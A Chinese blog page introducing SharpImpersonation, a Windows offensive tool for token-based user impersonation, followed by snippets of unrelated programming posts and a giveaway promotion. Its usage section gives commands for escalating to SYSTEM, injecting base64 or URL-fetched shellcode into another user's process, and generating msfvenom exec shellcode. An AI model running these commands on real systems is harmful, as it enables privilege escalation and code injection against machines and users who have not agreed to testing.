当前位置：首页 > news >正文

SharpImpersonation：一款基于令牌和Shellcode注入的用户模拟工具

news 2026/2/8 1:21:06

关于SharpImpersonation

SharpImpersonation是一款功能强大的用户模拟工具，该工具基于令牌机制和Shellcode注入技术实现其功能，可以帮助广大研究人员更好地对组织内部的网络环境和系统安全进行分析和测试。

该工具基于
Tokenvator的代码库实现其功能，并对其部分代码进行了优化，同时还添加了还嗯多其他的功能，并且还参考借鉴了很多其他优秀的开源工具。

功能介绍

1、使用list参数枚举本地系统中的所有用户；

2、以非提权上下文枚举本地系统中的所有用户；

3、自动提权为“SYSTEM”；

4、搜索目标用户名的第一个进程，将其进程ID作为目标；

5、支持从Webserver加载Stager；

6、…

工具下载

广大研究人员可以使用下列命令将该项目源码克隆至本地：

git clone https://github.com/S3cur3Th1sSh1t/SharpImpersonation.git

工具使用

枚举用户进程

PS > PS C:\temp> SharpImpersonation.exe list

枚举提权进程

PS > PS C:\temp> SharpImpersonation.exe list elevated

模拟目标用户的第一个进程并执行新的代码

PS > PS C:\temp> SharpImpersonation.exe user:<user> binary:<binary-Path>

向目标用户的第一个进程注入Base64编码的Shellcode

PS > PS C:\temp> SharpImpersonation.exe user:<user> shellcode:<base64shellcode>

从Webserver载入Shellcode并注入到目标用户的第一个进程

PS > PS C:\temp> SharpImpersonation.exe user:<user> shellcode:<URL>

通过ImpersonateLoggedOnuser模拟当前会话的目标用户

PS > PS C:\temp> SharpImpersonation.exe user:<user> technique:ImpersonateLoggedOnuser

生成msfvenom Shellcode并注入到其他用户进程中

msfvenom -p windows/x64/exec CMD=cmd.exe EXITFUNC=threadmsfvenom -p windows/x64/exec CMD=cmd.exe EXITFUNC=thread | base64 -w0

网络安全工程师企业级学习路线

这时候你当然需要一份系统性的学习路线

如图片过大被平台压缩导致看不清的话，可以在文末下载（无偿的），大家也可以一起学习交流一下。

一些我收集的网络安全自学入门书籍

一些我白嫖到的不错的视频教程：

上述资料【扫下方二维码】就可以领取了，无偿分享

SharpImpersonation：一款基于令牌和Shellcode注入的用户模拟工具

关于SharpImpersonation SharpImpersonation是一款功能强大的用户模拟工具，该工具基于令牌机制和Shellcode注入技术实现其功能，可以帮助广大研究人员更好地对组织内部的网络环境和系统安全进行分析和测试。该工具基于 Tokenvator的代码库实现其功能&a…...

编程日记 2023/5/23 17:19:38

华为OD机试 - 最大相连男生数（Python）| 真题+思路+代码

最大相连男生数题目学校组织活动，将学生排成一个矩形方阵。请在矩形方阵中找到最大的位置相连的男生数量。这个相连位置在一个直线上，方向可以是水平的、垂直的、成对角线的或者反对角线的。注：学生个数不会超过 10000。输入输入的第一行为矩阵的行数和列数，接下…...

编程日记 2023/4/8 1:12:15

GIS在地质灾害危险性评估与灾后重建中的实践技术应用及python机器学习灾害易发性评价模型建立与优化

地质灾害是指全球地壳自然地质演化过程中，由于地球内动力、外动力或者人为地质动力作用下导致的自然地质和人类的自然灾害突发事件。由于降水、地震等自然作用下，地质灾害在世界范围内频繁发生。我国除滑坡灾害外，还包括崩塌、泥石流、地面沉…...

编程日记 2023/5/14 8:33:04

2.13、进程互斥的硬件实现方法

1、中断屏蔽方法利用 “开/关中断指令” 实现（与原语的实现思想相同，即在某进程开始访问临界区到结束访问为止都不允许被中断，也就不能发生进程切换，因此也不可能发生两个同时访问临界区的情况） 优点：简单…...

编程日记 2023/5/14 8:35:42

Leetcode力扣秋招刷题路-2335

从0开始的秋招刷题路，记录下所刷每道题的题解，帮助自己回顾总结 2335. 装满杯子需要的最短总时长现有一台饮水机，可以制备冷水、温水和热水。每秒钟，可以装满 2 杯不同类型的水或者 1 杯任意类型的水。给你一个下标从 0 开…...

编程日记 2023/5/16 17:28:22

C语言深度解剖-关键字（6）

目录 1. 浮点型与零的比较： 1.1 推导： 1.2 实践： 总结： 理解强制类型转换： 指针与零比较 switch case 语句： 写在最后： 1. 浮点型与零的比较： 1.1 推导： 例&am…...

编程日记 2023/5/28 1:43:10

[多线程进阶]CAS与Synchronized基本原理

专栏简介: JavaEE从入门到进阶题目来源: leetcode,牛客,剑指offer. 创作目标: 记录学习JavaEE学习历程希望在提升自己的同时,帮助他人,,与大家一起共同进步,互相成长. 学历代表过去,能力代表现在,学习能力代表未来! 目录: 1.CAS 1.1 什么是CAS? 1.2 CAS伪代码 1.3 CAS …...

编程日记 2023/5/12 10:23:11

【Linux系统编程】02：文件操作

文件IO 系统调用（不带缓冲的IO操作）库函数（默认带用户缓冲的IO操作） 一、非缓冲IO 系统调用：即为不带缓冲的IO 1.打开文件open 2.读取文件read NAMEread - read from a file descriptorSYNOPSIS#include <unist…...

编程日记 2023/5/15 13:43:26

华为OD机试 - 去除多余空格（Python）| 真题+思路+代码

去除多余空格题目去除文本多余空格，但不去除配对单引号之间的多余空格。给出关键词的起始和结束下标，去除多余空格后刷新关键词的起始和结束下标。条件约束：不考虑关键词起始和结束位置为空格的场景；单词的的开始和结束下标保证涵盖一个完整的单词，即一个坐标对开…...

编程日记 2023/5/23 17:22:01

百趣代谢组学分享，补充α-酮酸的低蛋白饮食对肾脏具有保护作用

文章标题：Reno-Protective Effect of Low Protein Diet Supplemented With α-Ketoacid Through Gut Microbiota and Fecal Metabolism in 5/6 Nephrectomized Mice 发表期刊：Frontiers in Nutrition 影响因子：6.59 作者单位：…...

编程日记 2023/4/15 12:12:20

json对象和formData相互转换

前言大家都知道，前端在和后台进行交互联调时，肯定避免不了要传递参数，一般情况下，params 在 get 请求中使用，而 post 请求下，我们有两种常见的传参方式： JSON 对象格式和 formData 格式&#x…...

编程日记 2023/5/12 10:24:00

【c++面试问答】常量指针和指针常量的区别

问题常量指针和指针常量有什么区别？ const的优点在C中，关键字const用来只读一个变量或对象，它有以下几个优点： 便于类型检查，如函数的函数 func(const int a) 中a的值不允许变，这样便于保护实参。功能…...

编程日记 2023/5/23 17:23:50

Ubuntu18下编译android的ffmpeg经验

虽然按照网上的一些资料（如：最简单的基于FFmpeg的移动端例子：Android HelloWorld_雷霄骅的博客-CSDN博客_android ffmpeg 例子，，编译FFmpeg4.1.3并移植到Android app中使用（最详细的FFmpeg-Android编译教程…...

编程日记 2023/5/28 1:43:51

Spring Security in Action 第十三章实现OAuth2的认证端

本专栏将从基础开始，循序渐进，以实战为线索，逐步深入SpringSecurity相关知识相关知识，打造完整的SpringSecurity学习步骤，提升工程化编码能力和思维能力，写出高质量代码。希望大家都能够从中有所收获&#…...

编程日记 2023/5/16 17:29:43

本文章提供中国国界、国界十段线原始数据以及加载方法

本文章提供中国国界九段线原始数据和加载方法 1、中国国界完整数据包括十段线中国国界线(完整版包括十段线) 2、原始数据中国国界十段线topojson格式数据.rar 中国国界线topjson数据中国国界十段线svg格式数据.rar 中国国界线svg数据中国国界十段线shp格式数据…...

编程日记 2023/5/24 22:17:05

一文带你搞懂，Python语言运算符

Python语言支持很多种运算符，我们先用一个表格为大家列出这些运算符，然后选择一些马上就会用到的运算符为大家进行讲解。说明：上面这个表格实际上是按照运算符的优先级从上到下列出了各种运算符。所谓优先级就是在一个运算的表达式中&#x…...

编程日记 2023/5/28 1:54:21

JAVA集合专题4 —— Map

目录Map接口实现类的特点Map接口的常见方法Map六大遍历方式Map练习1code编程练习2code编程练习3思路codeMap接口实现类的特点 Map与Collection并列存在，是Map集合体系的顶级接口Map的有些子实现存储数据是有序的(LinkedHashMap)，有些子实现存储数据是无…...

编程日记 2023/5/28 1:54:11

二叉树进阶--二叉搜索树

目录 1.二叉搜索树 1.1 二叉搜索树概念 1.2 二叉搜索树操作 1.3 二叉搜索树的实现 1.4 二叉搜索树的应用 1.5 二叉搜索树的性能分析 2.二叉树进阶经典题： 1.二叉搜索树 1.1 二叉搜索树概念二叉搜索树又称二叉排序树，它或者是一棵空树，…...

编程日记 2023/5/28 1:55:55

牛客网Python篇数据分析习题（三）

1.现有一个Nowcoder.csv文件，它记录了牛客网的部分用户数据，包含如下字段（字段与字段之间以逗号间隔）： Nowcoder_ID：用户ID Level：等级 Achievement_value：成就值 Num_of_exercise&a…...

编程日记 2023/4/13 15:39:59

Java开发常见关键词集绵

一、关键词1： （1）RPC：远程过程调用（Remote Procedure Call）的缩写形式。远程调用的时候让人们觉得是本地调用。 （2）HTTP：超文本传输协议（Hyper Text Transfer…...

编程日记 2023/5/30 11:49:31

逻辑回归：给不确定性划界的分类大师

想象你是一名医生。面对患者的检查报告（肿瘤大小、血液指标），你需要做出一个**决定性判断**：恶性还是良性？这种“非黑即白”的抉择，正是**逻辑回归（Logistic Regression）** 的战场&a…...

编程新知 2025/10/27 21:25:04

1 方法一先用方法 keySet() 获取集合中的所有键。再通过 gey(key) 方法用对应键获取值 import java.util.HashMap; import java.util.Set;public class Test {public static void main(String[] args) {HashMap hashMap new HashMap();hashMap.put("语文",99);has…...

编程新知 2026/1/24 15:08:45

Go 语言接口详解

Go 语言接口详解核心概念接口定义在 Go 语言中，接口是一种抽象类型，它定义了一组方法的集合： // 定义接口 type Shape interface {Area() float64Perimeter() float64 } 接口实现 Go 接口的实现是隐式的： // 矩形结构体…...

编程新知 2026/1/4 5:19:25

抖音增长新引擎：品融电商，一站式全案代运营领跑者

抖音增长新引擎：品融电商，一站式全案代运营领跑者在抖音这个日活超7亿的流量汪洋中，品牌如何破浪前行？自建团队成本高、效果难控；碎片化运营又难成合力——这正是许多企业面临的增长困局。品融电商以「抖音全案代运营…...

编程新知 2026/2/1 5:45:17

IoT/HCIP实验-3/LiteOS操作系统内核实验(任务、内存、信号量、CMSIS..)

文章目录概述HelloWorld 工程C/C配置编译器主配置Makefile脚本烧录器主配置运行结果程序调用栈任务管理实验实验结果osal 系统适配层osal_task_create 其他实验实验源码内存管理实验互斥锁实验信号量实验 CMISIS接口实验还是得JlINKCMSIS 简介LiteOS->CMSIS任务间消息交互…...

编程新知 2026/1/31 23:44:39